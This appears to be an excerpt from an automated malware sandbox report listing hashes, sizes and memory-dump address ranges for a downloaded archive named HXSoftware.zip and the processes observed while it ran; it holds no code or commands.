SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\Downloads\HXSoftware.zipFilesize
12.0MB
MD5e2394cb6a06a1169645c367c9fda81e1
SHA1c969a42a9953d0f3f04b29d26c500ac4f0f0dd9a
SHA2564887920ef09966bfd09a3930b12912f64c22d52eb9c11f228581de1aab9e5dae
SHA512409eb4126ff7339610ebcc4d6933f3ecb6b7d2d941d85f95bae9bd99749c4a7fb214c7ef4692ead79a960fe5e2389341b173bb201807dbdd20bfde261c365a6d
-
C:\Users\Admin\Downloads\HXSoftware.zip:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
\??\pipe\LOCAL\crashpad_3192_MBPQLMEOQPDJNPBHMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/476-1078-0x00000230416B0000-0x00000230416DB000-memory.dmpFilesize
172KB
-
memory/476-1079-0x00007FFDB3E30000-0x00007FFDB3E40000-memory.dmpFilesize
64KB
-
memory/564-993-0x00000000003B0000-0x00000000003B9000-memory.dmpFilesize
36KB
-
memory/564-997-0x00007FFDF3DA0000-0x00007FFDF3FA9000-memory.dmpFilesize
2.0MB
-
memory/564-995-0x00000000021F0000-0x00000000025F0000-memory.dmpFilesize
4.0MB
-
memory/564-999-0x00000000777D0000-0x0000000077A22000-memory.dmpFilesize
2.3MB
-
memory/632-1072-0x00007FFDB3E30000-0x00007FFDB3E40000-memory.dmpFilesize
64KB
-
memory/632-1071-0x0000022EB40F0000-0x0000022EB411B000-memory.dmpFilesize
172KB
-
memory/632-1068-0x0000022EB40C0000-0x0000022EB40E4000-memory.dmpFilesize
144KB
-
memory/696-1074-0x0000025E50EE0000-0x0000025E50F0B000-memory.dmpFilesize
172KB
-
memory/696-1075-0x00007FFDB3E30000-0x00007FFDB3E40000-memory.dmpFilesize
64KB
-
memory/1080-952-0x0000000000880000-0x0000000000888000-memory.dmpFilesize
32KB
-
memory/1208-1063-0x00007FFDF3DA0000-0x00007FFDF3FA9000-memory.dmpFilesize
2.0MB
-
memory/1208-1057-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1208-1062-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1208-1065-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1208-1058-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1208-1064-0x00007FFDF2920000-0x00007FFDF29DD000-memory.dmpFilesize
756KB
-
memory/1208-1060-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1208-1059-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1240-1087-0x000001A7A0CF0000-0x000001A7A0D1B000-memory.dmpFilesize
172KB
-
memory/1240-1088-0x00007FFDB3E30000-0x00007FFDB3E40000-memory.dmpFilesize
64KB
-
memory/1312-1092-0x00007FFDB3E30000-0x00007FFDB3E40000-memory.dmpFilesize
64KB
-
memory/1312-1091-0x000001D1CD3B0000-0x000001D1CD3DB000-memory.dmpFilesize
172KB
-
memory/1660-996-0x0000000000810000-0x000000000087D000-memory.dmpFilesize
436KB
-
memory/1660-989-0x0000000003840000-0x0000000003C40000-memory.dmpFilesize
4.0MB
-
memory/1660-992-0x00000000777D0000-0x0000000077A22000-memory.dmpFilesize
2.3MB
-
memory/1660-977-0x0000000000810000-0x000000000087D000-memory.dmpFilesize
436KB
-
memory/1660-988-0x0000000003840000-0x0000000003C40000-memory.dmpFilesize
4.0MB
-
memory/1660-990-0x00007FFDF3DA0000-0x00007FFDF3FA9000-memory.dmpFilesize
2.0MB
-
memory/2624-1037-0x00007FFDF3DA0000-0x00007FFDF3FA9000-memory.dmpFilesize
2.0MB
-
memory/2624-1041-0x00000000002D0000-0x000000000033D000-memory.dmpFilesize
436KB
-
memory/2624-1039-0x00000000777D0000-0x0000000077A22000-memory.dmpFilesize
2.3MB
-
memory/2624-1025-0x00000000002D0000-0x000000000033D000-memory.dmpFilesize
436KB
-
memory/2624-1036-0x0000000003480000-0x0000000003880000-memory.dmpFilesize
4.0MB
-
memory/3656-954-0x00000212503D0000-0x00000212503F2000-memory.dmpFilesize
136KB
-
memory/4748-1043-0x00000000027F0000-0x0000000002BF0000-memory.dmpFilesize
4.0MB
-
memory/4748-1044-0x00007FFDF3DA0000-0x00007FFDF3FA9000-memory.dmpFilesize
2.0MB
-
memory/4748-1046-0x00000000777D0000-0x0000000077A22000-memory.dmpFilesize
2.3MB
-
memory/5104-25-0x00000258576B0000-0x0000025857920000-memory.dmpFilesize
2.4MB
-
memory/5104-18-0x0000025857690000-0x0000025857691000-memory.dmpFilesize
4KB
-
memory/5104-26-0x0000025857920000-0x0000025857930000-memory.dmpFilesize
64KB
-
memory/5104-2-0x00000258576B0000-0x0000025857920000-memory.dmpFilesize
2.4MB
-
memory/5104-24-0x0000025857920000-0x0000025857930000-memory.dmpFilesize
64KB